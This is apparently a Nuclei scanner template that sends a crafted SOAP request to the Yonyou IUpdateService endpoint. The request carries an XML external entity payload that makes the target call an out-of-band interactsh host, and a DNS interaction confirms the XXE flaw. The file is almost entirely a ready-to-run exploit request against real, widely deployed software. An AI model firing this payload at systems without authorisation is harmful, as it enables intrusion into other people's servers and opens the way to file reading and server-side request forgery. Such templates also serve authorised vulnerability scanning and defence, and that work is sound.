id: yongyou_xxe

info:
  name: yongyou IUpdateService接口xxe
  author: Str1am
  severity: high
  tags: yongyou

requests:
  - raw:
      - |
        POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: JSESSIONID=CFB52784DE6D242B7227956B925B10F4.server
        Content-Type: text/xml;charset=UTF-8
        Connection: close
        Content-Length: 430

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
        <soapenv:Header/>
        <soapenv:Body>
        <iup:getResult>
        <!--type: string-->
        <iup:string>
        <![CDATA[<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://{{interactsh-url}}">%aaa;]><xxx/>]]>
        </iup:string>
        </iup:getResult>
        </soapenv:Body>
        </soapenv:Envelop>


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"